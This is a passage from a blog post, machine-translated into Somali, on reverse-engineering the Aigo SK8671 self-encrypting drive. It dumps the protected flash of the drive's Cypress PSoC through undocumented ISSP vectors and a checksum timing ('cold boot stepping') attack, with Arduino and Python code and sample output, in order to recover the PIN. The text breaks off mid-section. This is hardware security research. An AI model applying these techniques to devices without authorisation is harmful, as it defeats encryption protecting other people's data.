ProHoster > Π‘Π»ΠΎΠ³ > Maamulka > Dib u noqoshada iyo jabsiga Aigo is-encrypting dibadeed drive HDD. Qaybta 2: qashin qubka Cypress PSoC

Dib u noqoshada iyo jabsiga Aigo is-encrypting dibadeed drive HDD. Qaybta 2: qashin qubka Cypress PSoC

Tani waa qaybtii labaad ee ugu dambaysay ee maqaalka ku saabsan jabsiga dibadeed is-encrypting drives. Aan ku xasuusiyo in saaxiibkiis uu dhawaan ii keenay Patriot (Aigo) SK8671 hard drive, waxaanan go'aansaday inaan beddelo, oo hadda waxaan la wadaagayaa wixii ka soo baxay. Intaadan wax sii akhriyin, hubi inaad akhrido qaybta koowaad qodobbada.

4. Waxaan bilaabaynaa inaan qashinka ka qaadno gudaha PSoC flash drive
5. Baratakoolka ISSP
– 5.1. Waa maxay ISSP
– 5.2. Demystifying Vectors
– 5.3. Xiriirinta PSoC
– 5.4. Aqoonsiga diiwaannada-chip-ka
– 5.5. Qaybaha amniga
6. Weerarkii ugu horeeyay (fashilmay): ROMX
7. Weerarka Labaad: Baafinta Kabaha Qabow
– 7.1. Hirgelinta
– 7.2. Akhrinta natiijada
– 7.3. Dib u dhiska binary Flash
– 7.4. Helitaanka cinwaanka kaydinta koodka PIN
– 7.5. Qaadashada qashinka baloogga No. 126
– 7.6. Soo kabashada koodhka PIN
8. Maxaa xiga?
9. Gunaanad

Dib u noqoshada iyo jabsiga Aigo is-encrypting dibadeed drive HDD. Qaybta 2: qashin qubka Cypress PSoC


4. Waxaan bilaabaynaa inaan qashinka ka qaadno gudaha PSoC flash drive

Markaa, wax walbaa waxay muujinayaan (sida aan ku dhisnay [qaybta koowaad]()) in koodhka sirta ah lagu kaydiyo qoto dheer ee PSoC. Sidaa darteed, waxaan u baahannahay inaan akhrino qoto-dheeraantaas. Hore ee shaqada lagama maarmaanka ah:

  • la xakameyso "xidhiidhka" kantaroolka yar;
  • hel hab aad ku hubiso in "xidhiidhka" uu ka ilaaliyo wax akhrinta dibadda;
  • raadso hab aad kaga gudubto ilaalinta.

Waxaa jira laba meelood oo ay macno samaynayso in la raadiyo koodka PIN sax ah:

  • xusuusta gudaha gudaha;
  • SRAM, halkaas oo koodhka biinanka lagu kaydin karo si loo barbar dhigo koodhka pin-ka ee isticmaaluhu galo.

Anigoo horay u eegaya, waxaan ogaan doonaa inaan wali ku guuleystey inaan daadiyo gudaha gudaha PSoC flash drive - anigoo ka gudbaya nidaamkeeda amniga anigoo adeegsanaya weerarka qalabka loo yaqaan "raadinta kabaha qabow" - ka dib markii aan dib u rogay awoodaha aan diiwaangashanayn ee nidaamka ISSP. Tani waxay ii ogolaatay inaan si toos ah u tuuro lambarka sirta ah ee dhabta ah.

$ ./psoc.py 
syncing: KO OK
[...]
PIN: 1 2 3 4 5 6 7 8 9

Koodhka barnaamijka kama dambaysta ah:

5. Baratakoolka ISSP

5.1. Waa maxay ISSP

"Xidhiidhka" kantaroolaha yar-yar waxay macnaheedu noqon kartaa waxyaabo kala duwan: laga bilaabo "iibiyaha ilaa iibiyaha" ilaa isdhexgalka iyadoo la adeegsanayo borotokool taxan (tusaale, ICSP ee Microchip's PIC).

Cypress waxay leedahay borotokool u gaar ah tan, oo loo yaqaan ISSP (in-system protocol serial programming), kaas oo qayb ahaan lagu sifeeyay qeexid farsamo. Patent US7185162 sidoo kale waxay bixisaa xoogaa macluumaad ah. Waxa kale oo jira OpenSource u dhiganta oo loo yaqaan HSSP (wax yar ka dib ayaan isticmaali doonaa). ISSP waxay u shaqeysaa sida soo socota:

  • dib u soo kabashada PSoC;
  • u soo saar lambarka sixirka biinka xogta taxanaha ah ee PSoC-kan; si aad u gasho habka barnaamijka dibadda;
  • soo dir amarrada, kuwaas oo ah xadhkaha yaryar ee dheer ee loo yaqaan "vectors".

Dukumeentiga ISSP waxa ay ku qeexan yihiin kuwan in yar oo amarro ah:

  • Bilawga-1
  • Bilawga-2
  • Bilow-3 (3V iyo 5V xulashooyinka)
  • ID-SETUP
  • AKHRISO-ID-EREYADA
  • SET-BLOCK-NUM: 10011111010dddddddd111, halkaas oo dddddddd= xannibaad #
  • CUSBOONAYSIIN
  • BARNAAMIJKA-XOGTA
  • XAQIIJIN-SETUP
  • AKHRISO-BYTE: 10110aaaaaaZDDDDDDDDZ1, halka DDDDDDDD = xogta ka baxday, aaaaa = ciwaanka (6 bits)
  • WRITE-BYTE: 10010aaaaaaddddddd111, halka dddddddd = xogta ku jirta, aaaaa = ciwaanka (6 bits)
  • AAMIN
  • EEGSUM-SETUP
  • AKHRISO-ChecksUM: 10111111001ZDDDDDDDDZ110111111000ZDDDDDDDDZ1, halkaas oo DDDDDDDDDDDDDDDD = xogta laga saaray: hubinta qalabka
  • XOOJINTA MASIRTA

Tusaale ahaan, vector for Initialize-2:

1101111011100000000111 1101111011000000000111
1001111100000111010111 1001111100100000011111
1101111010100000000111 1101111010000000011111
1001111101110000000111 1101111100100110000111
1101111101001000000111 1001111101000000001111
1101111000000000110111 1101111100000000000111
1101111111100010010111

Dhammaan xididdada waxay leeyihiin dherer isku mid ah: 22 bits. Dukumeentiga HSSP waxa ay hayaan macluumaad dheeraad ah oo ku saabsan ISSP: "Vektoor ISSP waa wax aan ka badnayn wax yar oo isku xigxiga oo ka dhigan tilmaamo."

5.2. Demystifying Vectors

Aynu ogaano waxa halkan ka socda. Markii hore, waxaan u qaatay in vectors-yadan la mid ah ay ahaayeen noocyada cayriin ee tilmaamaha M8C, laakiin ka dib markii aan hubiyay mala-awaalkan, waxaan ogaaday in opcodes-yada hawlgallada aysan ku habboonayn.

Ka dib waxaan google-ka galiyay vector-ka sare oo aan la kulmay tan Daraasad uu qoraagu, inkasta oo aanu tafaasiil ka bixin, haddana waxa uu soo jeedinayaa talooyin wax ku ool ah: β€œTilmaan kastaa waxa ay ku bilaabataa saddex xabbadood oo u dhiganta mid ka mid ah afar mnemonics (ka akhri RAM, ku qor RAM, akhri diiwaanka, qor diiwaanka). Ka dib waxaa jira 8 ciwaanka ciwaanka ah, oo ay ku xigto 8 data bits (akhri ama qor) iyo ugu dambeyntii saddex xabbadood oo joogsi ah."

Kadib waxaan awooday inaan ka soo ururiyo macluumaad aad waxtar u leh qaybta Kormeeraha ROM (SROM). buug-gacmeedka farsamada. SROM waa ROM adag oo ku jira PSoC kaas oo bixiya hawlaha utility (si la mid ah Syscall) ee code barnaamijka ku shaqeeya booska isticmaalaha:

  • 00h:SWBootReset
  • 01h: ReadBlock
  • 02h: WriteBlock
  • 03h: Tirtir xannibaad
  • 06h: TableRead
  • 07h: CheckSum
  • 08h: Calibrate0
  • 09h: Calibrate1

Marka la barbardhigo magacyada vector-ka iyo hawlaha SROM-ka, waxaan ku sawiri karnaa hawlgallada kala duwan ee uu taageerayo borotokoolka cabbirrada SROM-ka ee la filayo. Mahadsanid tan, waxaan go'aamin karnaa saddexda qaybood ee ugu horreeya ee vectors ISSP:

  • 100 => "wrem"
  • 101 => "rdmem"
  • 110 => "qalad"
  • 111 => "rdreg"

Si kastaba ha ahaatee, faham buuxa oo ku saabsan hababka Chip-ku waxa kaliya oo lagu heli karaa xiriir toos ah oo lala yeesho PSoC.

5.3. Xiriirinta PSoC

Tan iyo markii Dirk Petrautsky uu hore u lahaa xamaali Koodhka HSSP ee Cypress ee Arduino, waxaan isticmaalay Arduino Uno si aan ugu xidho xidhiidhiyaha ISSP ee sabuuradda kiiboodhka.

Fadlan ogow in intii aan cilmi-baadhista ku jiray, in aan waxoogaa beddelay koodka Dirk. Waxaad ka heli kartaa wax ka beddelkayga GitHub: halkan iyo qoraalka Python ee u dhigma ee lagula xidhiidho Arduino, ee ku jira kaydkayga cypress_psoc_tools.

Marka, anigoo isticmaalaya Arduino, waxaan markii hore u adeegsaday kaliya "rasmiga" vectors-ka "xidhiidhka". Waxaan isku dayay inaan akhriyo ROM-ka gudaha anigoo isticmaalaya amarka VERIFY. Sidii la filayey, ma awoodin inaan tan sameeyo. Waxay u badan tahay inay sabab u tahay xaqiiqda ah in kaydinta ilaalinta la akhriyo lagu hawlgeliyo gudaha flash-ka.

Ka dib waxaan abuuray dhowr ka mid ah vectors fudud oo aniga ii gaar ah si aan u qoro iyo akhriyo xusuusta/diwaangelinta. Fadlan ogow in aan akhrin karno SROM-ka oo dhan inkasta oo flash drive-ka la ilaaliyo!

5.4. Aqoonsiga diiwaannada-chip-ka

Ka dib markii aan eegay vectors "la furfuray", waxaan ogaaday in qalabku isticmaalo diiwaanada aan sharciyeysnayn (0xF8-0xFA) si loo caddeeyo M8C opcodes, kuwaas oo si toos ah loo fuliyo, iyada oo laga gudbayo ilaalinta. Tani waxay ii ogolaatay inaan ku shaqeeyo opcodes kala duwan sida "ADD", "MOV A, X", "PUSH" ama "JMP". Waad ku mahadsan tahay iyaga (adiga oo eegaya dhibaatooyinka ay ku leeyihiin diiwaanka) Waxaan awooday inaan go'aamiyo mid ka mid ah diiwaannada aan sharciyeysneyn ee dhab ahaantii diiwaanka caadiga ah (A, X, SP iyo PC).

Natiijo ahaan, koodka "la furfuray" ee uu soo saaray aaladda HSSP_disas.rb waxay u egtahay sidan (waxaan ku daray faallooyin si aan u caddeeyo):

--== init2 ==--
[DE E0 1C] wrreg CPU_F (f7), 0x00   # сброс Ρ„Π»Π°Π³ΠΎΠ²
[DE C0 1C] wrreg SP (f6), 0x00      # сброс SP
[9F 07 5C] wrmem KEY1, 0x3A     # ΠΎΠ±ΡΠ·Π°Ρ‚Π΅Π»ΡŒΠ½Ρ‹ΠΉ Π°Ρ€Π³ΡƒΠΌΠ΅Π½Ρ‚ для SSC
[9F 20 7C] wrmem KEY2, 0x03     # Π°Π½Π°Π»ΠΎΠ³ΠΈΡ‡Π½ΠΎ
[DE A0 1C] wrreg PCh (f5), 0x00     # сброс PC (MSB) ...
[DE 80 7C] wrreg PCl (f4), 0x03     # (LSB) ... Π΄ΠΎ 3 ??
[9F 70 1C] wrmem POINTER, 0x80      # RAM-ΡƒΠΊΠ°Π·Π°Ρ‚Π΅Π»ΡŒ для Π²Ρ‹Ρ…ΠΎΠ΄Π½Ρ‹Ρ… Π΄Π°Π½Π½Ρ‹Ρ…
[DF 26 1C] wrreg opc1 (f9), 0x30        # Опкод 1 => "HALT"
[DF 48 1C] wrreg opc2 (fa), 0x40        # Опкод 2 => "NOP"
[9F 40 3C] wrmem BLOCKID, 0x01  # BLOCK ID для Π²Ρ‹Π·ΠΎΠ²Π° SSC
[DE 00 DC] wrreg A (f0), 0x06       # Π½ΠΎΠΌΠ΅Ρ€ "Syscall" : TableRead
[DF 00 1C] wrreg opc0 (f8), 0x00        # Опкод для SSC, "Supervisory SROM Call"
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12    # НСдокуммСнтированная опСрация: Π²Ρ‹ΠΏΠΎΠ»Π½ΠΈΡ‚ΡŒ внСшний ΠΎΠΏΠΊΠΎΠ΄

5.5. Qaybaha amniga

Marxaladdan mar horeba waan la xiriiri karaa PSoC, laakiin weli ma hayo macluumaad la isku halleyn karo oo ku saabsan qaybaha amniga ee flash-ka. Waxaan aad ula yaabay xaqiiqda ah in Cypress uusan siinin isticmaalaha qalabka si kasta oo uu u hubiyo in ilaalintu ay shaqeyso. Waxaan si qoto dheer u sii galay Google si aan ugu dambeyntii u fahmo in HSSP code-ka ay bixiso Cypress la cusboonaysiiyay ka dib markii Dirk uu sii daayay beddelkiisa. Oo sidaas! Waxa soo muuqday faytarkan cusub:

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[9F A0 1C] wrmem 0xFD, 0x00 # нСизвСстныС Π°Ρ€Π³ΡƒΠΌΠ΅Π½Ρ‚Ρ‹
[9F E0 1C] wrmem 0xFF, 0x00 # Π°Π½Π°Π»ΠΎΠ³ΠΈΡ‡Π½ΠΎ
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 02 1C] wrreg A (f0), 0x10   # Π½Π΅Π΄ΠΎΠΊΡƒΠΌΠ΅Π½Ρ‚ΠΈΡ€ΠΎΠ²Π°Π½Π½Ρ‹ΠΉ syscall !
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

Isticmaalka vector-kan (eeg read_security_data in psoc.py), waxaan helnaa dhammaan qaybaha amniga ee SRAM 0x80, halkaas oo ay jiraan laba bits halkii baloog la ilaaliyo.

Natiijadu waa niyad jab: wax walba waxaa lagu ilaaliyaa habka "dami akhrinta iyo qorista dibadda". Sidaa darteed, ma aha oo kaliya inaanan waxba ka akhriyin flash drive, laakiin ma qori karno midkoodna (tusaale ahaan, in lagu rakibo qashinka ROM halkaas). Habka kaliya ee lagu joojin karo ilaalinta waa in gebi ahaanba la tirtiro dhammaan jajabka. πŸ™

6. Weerarkii ugu horeeyay (fashilmay): ROMX

Si kastaba ha ahaatee, waxaan isku dayi karnaa khiyaamadan soo socota: maadaama aan awood u leenahay inaan fulino opcodes aan sabab lahayn, maxaa diidaya in la fuliyo ROMX, kaas oo loo isticmaalo akhrinta xusuusta flash? Habkani wuxuu leeyahay fursad wanaagsan oo lagu guuleysto. Sababtoo ah shaqada ReadBlock ee akhrinaysa xogta SROM-ka (oo ay isticmaalaan vectors) waxay hubiyaan in laga soo wacay ISSP iyo in kale. Si kastaba ha ahaatee, ROMX opcode si macquul ah ma lahaan karo jeeg noocaas ah. Markaa waa kan koodka Python (ka dib markii lagu daro dhawr fasal oo caawiye koodka Arduino):

for i in range(0, 8192):
    write_reg(0xF0, i>>8)       # A = 0
    write_reg(0xF3, i&0xFF)     # X = 0
    exec_opcodes("x28x30x40")    # ROMX, HALT, NOP
    byte = read_reg(0xF0)       # ROMX reads ROM[A|X] into A
    print "%02x" % ord(byte[0]) # print ROM byte

Nasiib darro koodkan ma shaqeeyo. πŸ™ Ama waa ay shaqeysaa, laakiin wax soo saarka waxaan helnaa opcodes noo gaar ah (0x28 0x30 0x40)! Uma maleynayo in shaqeynta u dhiganta ee qalabku ay tahay shay ka mid ah ilaalinta akhrinta. Tani waxay u badan tahay sida farsamada injineernimada: marka la fulinayo opcodes dibadda ah, baska ROM-ka waxaa loo jiheeyaa kayd ku meel gaar ah.

7. Weerarka Labaad: Baafinta Kabaha Qabow

Maadaama khiyaanada ROMX aysan shaqayn, waxaan bilaabay inaan ka fikiro nooc kale oo khiyaamadan ah - oo lagu sharaxay daabacaadda "Ku daadinta iftiin aad u badan oo ku saabsan Ilaalinta Firmware-ka Microcontroller".

7.1. Hirgelinta

Dukumeentiga ISSP waxa uu bixiyaa vector-ka soo socda ee CHECKSUM-SETUP:

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[9F 40 1C] wrmem BLOCKID, 0x00
[DE 00 FC] wrreg A (f0), 0x07
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

Tani waxay asal ahaan ugu yeertaa shaqada SROM 0x07, sida lagu soo bandhigay dukumeentiyada (talics mine):

Xaqiijinta hubinta shaqadan Waxay xisaabinaysaa jeegga 16-bit ee tirada blocks ee isticmaala-qeexay ee hal bangi oo flash ah, laga bilaabo eber. Halbeegga BLOCKID waxaa loo isticmaalaa in lagu dhaafo tirada baloogyada la isticmaali doono marka la xisaabinayo xisaabinta jeegga. Qiimaha "1" wuxuu kaliya xisaabin doonaa jeegagga eber; halka "0" waxay keeni doontaa in la xisaabiyo wadarta jeegaga dhammaan 256 baloog ee bangiga flash-ka. Jeegaga 16-bit waxaa lagu soo celiyaa KEY1 iyo KEY2. Halbeegga KEY1 waxa uu kaydiyaa dalabka hoose ee 8 ee jeegagga, iyo halbeegga KEY2 waxa uu kaydiyaa dalabka sare ee 8. Aaladaha leh dhowr bangi oo fiish ah, shaqada jeegagga ayaa mid walba si gaar ah loogu yeeraa. Lambarka bangiga ee uu ku shaqayn doono waxaa dejiya diiwaanka FLS_PR1 (adiga oo dejinaya inyar oo ku jirta oo u dhiganta bangiga bartilmaameedka).

Ogsoonow in tani ay tahay xisaab hubin fudud: bytes ayaa si fudud loogu daray midba midka kale; ma jiro CRC cajiib ah. Intaa waxaa dheer, anigoo og in xudunta M8C ay leedahay diiwaangelin aad u yar, waxaan u qaatay in marka la xisaabinayo jeegga, qiimaha dhexdhexaadka ah lagu qori doono doorsoomayaal isku mid ah oo ugu dambeyntii aadi doona wax soo saarka: KEY1 (0xF8) / KEY2 ( 0xF9).

Markaa aragti ahaan weerarkaygu wuxuu u eg yahay sidan:

  1. Waxaan ku xirnay ISSP.
  2. Waxaan ku bilownaa xisaabinta jeegaga anagoo adeegsanayna CHECKSUM-SETUP vector.
  3. Waxaan dib u kicinay processor-ka ka dib waqti cayiman T.
  4. Waxaan akhrinay RAM si aan u helno jeegga hadda C.
  5. Ku celi tillaabooyinka 3 iyo 4, kordhinta T wax yar mar kasta.
  6. Waxaan ka soo kabsaneynaa xogta flash-ka anagoo ka jarnay jeeggii hore C kan hadda jira.

Si kastaba ha ahaatee, waxaa jirta dhibaato: Initialize-1 vector oo ay tahay in aan dirno ka dib dib-u-kicinta KEY1 iyo KEY2:

1100101000000000000000  # Магия, пСрСводящая PSoC Π² Ρ€Π΅ΠΆΠΈΠΌ программирования
nop
nop
nop
nop
nop
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A # ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»ΡŒΠ½Π°Ρ сумма пСрСзаписываСтся здСсь
[9F 20 7C] wrmem KEY2, 0x03 # и здСсь
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 01 3C] wrreg A (f0), 0x09   # SROM-функция 9
[DF 00 1C] wrreg opc0 (f8), 0x00    # SSC
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

Koodhkani wuxuu dib u qoraa jeeggeena qaaliga ah isagoo wacaya Calibrate1 (SROM function 9). Oo haa, way shaqeysaa! Koodhka Arduino ee fuliya weerarkan waa mid fudud:

case Cmnd_STK_START_CSUM:
    checksum_delay = ((uint32_t)getch())<<24;
    checksum_delay |= ((uint32_t)getch())<<16;
    checksum_delay |= ((uint32_t)getch())<<8;
    checksum_delay |= getch();
    if(checksum_delay > 10000) {
        ms_delay = checksum_delay/1000;
        checksum_delay = checksum_delay%1000;
    }
    else {
        ms_delay = 0;
    }
    send_checksum_v();
    if(checksum_delay)
        delayMicroseconds(checksum_delay);
    delay(ms_delay);
    start_pmode();

  1. Akhri checkum_delay
  2. Ku socodsii xisaabinta jeegagga (send_checksum_v).
  3. Sug wakhti cayiman; iyada oo la tixgelinayo dhibaatooyinka soo socda:
    • Waqti badan ayaa iga lumiyay ilaa aan ogaaday waxa ku soo baxay daahitaanka Microsecond u shaqeeya si sax ah kaliya dib u dhac aan ka badnayn 16383 ΞΌs;
    • ka dibna mar kale dilay isla wakhtigaas ilaa aan ogaaday in daahitaankaMicroseconds, haddii 0 loo gudbiyo sida wax gelinta, si buuxda u shaqeeyaa si khaldan!
  4. Dib u billow PSoC-da qaabka barnaamijka (waxa aanu dirnaa lambarka sixirka, annagoo dirin vectors-ka bilawga ah).

Koodhka kama dambaysta ah ee Python:

for delay in range(0, 150000):  # Π·Π°Π΄Π΅Ρ€ΠΆΠΊΠ° Π² микросСкундах
    for i in range(0, 10):      # количСство считывания для ΠΊΠ°ΠΆΠ΄ΠΎΠΉΠΈΠ· Π·Π°Π΄Π΅Ρ€ΠΆΠ΅ΠΊ
        try:
            reset_psoc(quiet=True)  # ΠΏΠ΅Ρ€Π΅Π·Π°Π³Ρ€ΡƒΠ·ΠΊΠ° ΠΈ Π²Ρ…ΠΎΠ΄ Π² Ρ€Π΅ΠΆΠΈΠΌ программирования
            send_vectors()      # ΠΎΡ‚ΠΏΡ€Π°Π²ΠΊΠ° ΠΈΠ½ΠΈΡ†ΠΈΠ°Π»ΠΈΠ·ΠΈΡ€ΡƒΡŽΡ‰ΠΈΡ… Π²Π΅ΠΊΡ‚ΠΎΡ€ΠΎΠ²
            ser.write("x85"+struct.pack(">I", delay)) # Π²Ρ‹Ρ‡ΠΈΡΠ»ΠΈΡ‚ΡŒ ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»ΡŒΠ½ΡƒΡŽ сумму + ΠΏΠ΅Ρ€Π΅Π·Π°Π³Ρ€ΡƒΠ·ΠΈΡ‚ΡŒΡΡ послС Π·Π°Π΄Π΅Ρ€ΠΆΠΊΠΈ
            res = ser.read(1)       # ΡΡ‡ΠΈΡ‚Π°Ρ‚ΡŒ arduino ACK
        except Exception as e:
            print e
            ser.close()
            os.system("timeout -s KILL 1s picocom -b 115200 /dev/ttyACM0 2>&1 > /dev/null")
            ser = serial.Serial('/dev/ttyACM0', 115200, timeout=0.5) # ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚ΡŒ ΠΏΠΎΡΠ»Π΅Π΄ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒΠ½Ρ‹ΠΉ ΠΏΠΎΡ€Ρ‚
            continue
        print "%05d %02X %02X %02X" % (delay,      # ΡΡ‡ΠΈΡ‚Π°Ρ‚ΡŒ RAM-Π±Π°ΠΉΡ‚Ρ‹
                read_regb(0xf1),
                read_ramb(0xf8),
                read_ramb(0xf9))

Marka la soo koobo, muxuu xeerkani qabto:

  1. Dib u kiciyaa PSoC (oo u dirtaa lambar sixir ah).
  2. Wuxuu soo diraa xuubka bilawga buuxa.
  3. Wuxuu wacaa shaqada Arduino Cmnd_STK_START_CSUM (0x85), halkaas oo daahitaanka mikrose seconds loo gudbiyo halbeeg ahaan.
  4. Wuxuu akhriyaa jeeggaga (0xF8 iyo 0xF9) iyo diiwaanka aan sharciyeysnayn 0xF1.

Koodhkan waxa la fuliyaa 10 jeer 1 micro seconds. 0xF1 ayaa halkan lagu soo daray sababtoo ah waxay ahayd diiwaanka kaliya ee bedelay marka la xisaabinayo jeegga. Waxaa laga yaabaa inay tahay nooc ka mid ah doorsoomayaasha ku meel gaadhka ah ee loo isticmaalo unugga macquulka ah ee xisaabtu. Ogsoonow jabsiga foosha xun ee aan u isticmaalo dib-u-dejinta Arduino anigoo isticmaalaya picocom marka Arduino joojiyo muujinta calaamadaha nolosha (ma jiraan wax fikrad ah sababta).

7.2. Akhrinta natiijada

Natiijada qoraalka Python waxay u egtahay sidan (loo fududeeyay in la akhriyo):

DELAY F1 F8 F9  # F1 – Π²Ρ‹ΡˆΠ΅ΡƒΠΏΠΎΠΌΡΠ½ΡƒΡ‚Ρ‹ΠΉ нСизвСстный рСгистр
                  # F8 младший Π±Π°ΠΉΡ‚ ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»ΡŒΠ½ΠΎΠΉ суммы
                  # F9 ΡΡ‚Π°Ρ€ΡˆΠΈΠΉ Π±Π°ΠΉΡ‚ ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»ΡŒΠ½ΠΎΠΉ суммы

00000 03 E1 19
[...]
00016 F9 00 03
00016 F9 00 00
00016 F9 00 03
00016 F9 00 03
00016 F9 00 03
00016 F9 00 00  # ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»ΡŒΠ½Π°Ρ сумма сбрасываСтся Π² 0
00017 FB 00 00
[...]
00023 F8 00 00
00024 80 80 00  # 1-ΠΉ Π±Π°ΠΉΡ‚: 0x0080-0x0000 = 0x80 
00024 80 80 00
00024 80 80 00
[...]
00057 CC E7 00   # 2-ΠΉ Π±Π°ΠΉΡ‚: 0xE7-0x80: 0x67
00057 CC E7 00
00057 01 17 01  # понятия Π½Π΅ имСю, Ρ‡Ρ‚ΠΎ здСсь происходит
00057 01 17 01
00057 01 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 F8 E7 00  # Π‘Π½ΠΎΠ²Π° E7?
00058 D0 17 01
[...]
00059 E7 E7 00
00060 17 17 00  # Π₯ΠΌΠΌΠΌΠΌΠΌΠΌ
[...]
00062 00 17 00
00062 00 17 00
00063 01 17 01  # А, дошло! Π’ΠΎΡ‚ ΠΎΠ½ ΠΆΠ΅ пСрСнос Π² ΡΡ‚Π°Ρ€ΡˆΠΈΠΉ Π±Π°ΠΉΡ‚
00063 01 17 01
[...]
00075 CC 17 01  # Π˜Ρ‚Π°ΠΊ, 0x117-0xE7: 0x30

Taas marka la dhaho, dhib ayaa naga haysata: maadaama aan ku shaqaynayno jeegag dhab ah, byte-ka null ma beddelo qiimaha akhrinta. Si kastaba ha ahaatee, maadaama habka xisaabinta oo dhan (8192 bytes) ay qaadato 0,1478 ilbiriqsi (oo leh kala duwanaansho yar mar kasta oo la ordo), taas oo u dhiganta ku dhawaad ​​18,04 ΞΌs per byte, waxaan isticmaali karnaa wakhtigan si aan u hubinno qiimaha jeegga wakhtiyada ku habboon. Hawlaha ugu horreeya, wax walba si fudud ayaa loo akhriyaa, maadaama muddada nidaamka xisaabinta ay had iyo jeer ku dhowdahay isku mid. Si kastaba ha ahaatee, dhamaadka qashin-qubkani waa mid sax ah sababtoo ah "waqtiga yar ee leexashada" ee orod kasta ayaa isku darka inay noqdaan kuwo muhiim ah:

134023 D0 02 DD
134023 CC D2 DC
134023 CC D2 DC
134023 CC D2 DC
134023 FB D2 DC
134023 3F D2 DC
134023 CC D2 DC
134024 02 02 DC
134024 CC D2 DC
134024 F9 02 DC
134024 03 02 DD
134024 21 02 DD
134024 02 D2 DC
134024 02 02 DC
134024 02 02 DC
134024 F8 D2 DC
134024 F8 D2 DC
134025 CC D2 DC
134025 EF D2 DC
134025 21 02 DD
134025 F8 D2 DC
134025 21 02 DD
134025 CC D2 DC
134025 04 D2 DC
134025 FB D2 DC
134025 CC D2 DC
134025 FB 02 DD
134026 03 02 DD
134026 21 02 DD

Taasi waa 10 qashin oo daahitaan ilbiriqsi kasta ah. Wadarta wakhtiga shaqada ee daadinta dhammaan 8192 bytes ee flash drive waa ilaa 48 saacadood.

7.3. Dib u dhiska binary Flash

Wali maan dhamaystirin qorista koodka kaas oo si buuxda dib u dhisi doona koodhka barnaamijka ee flash-ka, iyadoo la tixgalinayo mar kasta oo weecan. Si kastaba ha ahaatee, waxaan mar hore soo celiyay bilawga koodkan. Si aan u hubiyo inaan si sax ah u sameeyay, waxaan kala furfuray anigoo isticmaalaya m8cdis:

0000: 80 67   jmp  0068h     ; Reset vector
[...]
0068: 71 10   or  F,010h
006a: 62 e3 87 mov  reg[VLT_CR],087h
006d: 70 ef   and  F,0efh
006f: 41 fe fb and  reg[CPU_SCR1],0fbh
0072: 50 80   mov  A,080h
0074: 4e    swap A,SP
0075: 55 fa 01 mov  [0fah],001h
0078: 4f    mov  X,SP
0079: 5b    mov  A,X
007a: 01 03   add  A,003h
007c: 53 f9   mov  [0f9h],A
007e: 55 f8 3a mov  [0f8h],03ah
0081: 50 06   mov  A,006h
0083: 00    ssc
[...]
0122: 18    pop  A
0123: 71 10   or  F,010h
0125: 43 e3 10 or  reg[VLT_CR],010h
0128: 70 00   and  F,000h ; Paging mode changed from 3 to 0
012a: ef 62   jacc 008dh
012c: e0 00   jacc 012dh
012e: 71 10   or  F,010h
0130: 62 e0 02 mov  reg[OSC_CR0],002h
0133: 70 ef   and  F,0efh
0135: 62 e2 00 mov  reg[INT_VC],000h
0138: 7c 19 30 lcall 1930h
013b: 8f ff   jmp  013bh
013d: 50 08   mov  A,008h
013f: 7f    ret

Waxay u egtahay mid macquul ah!

7.4. Helitaanka cinwaanka kaydinta koodka PIN

Hadda oo aan akhrin karno jeegagga wakhtiyada aan u baahanahay, waxaan si fudud u hubin karnaa sida iyo meesha ay isku beddesho markaan:

  • geli lambarka sirta ah ee khaldan;
  • Beddel furka koodka.

Marka hore, si aan u helo ciwaanka kaydinta qiyaastii, waxaan qaaday qashin-qubka jeegaga 10 ms kordhinta kadib dib-u-kicinta. Kadibna waxaan galay PIN khaldan oo aan sameeyay.

Natiijadu ma ahayn mid aad u faraxsan, maadaama ay jiraan isbeddello badan. Laakin ugu danbayntii waxaan awooday in aan ogaado in jeeggu is badalay meel u dhaxaysa 120000 Β΅s iyo 140000 Β΅s oo daahitaan ah. Laakiin "pincode" ee aan ku soo bandhigay halkaas gabi ahaanba wuu khaldanaa - sababtoo ah artifact ee habraaca daahitaankaMicrosecond, kaas oo sameeya waxyaabo yaab leh marka 0 loo gudbiyo.

Dabadeed, ka dib markii aan qaatay ku dhawaad ​​3 saacadood, waxaan xusuustay in nidaamka SROM-ka ee wac CheckSum uu helo dood ahaan gelinta taas oo qeexaysa tirada baloogyada jeeggaga! Taasi. Waxaan si fudud u meel dhigi karnaa ciwaanka kaydinta ee koodhka sirta ah iyo miiska "isku dayo khaldan" oo sax ah ilaa 64-byte block.

Orodkeygii ugu horreeyay wuxuu keenay natiijada soo socota:

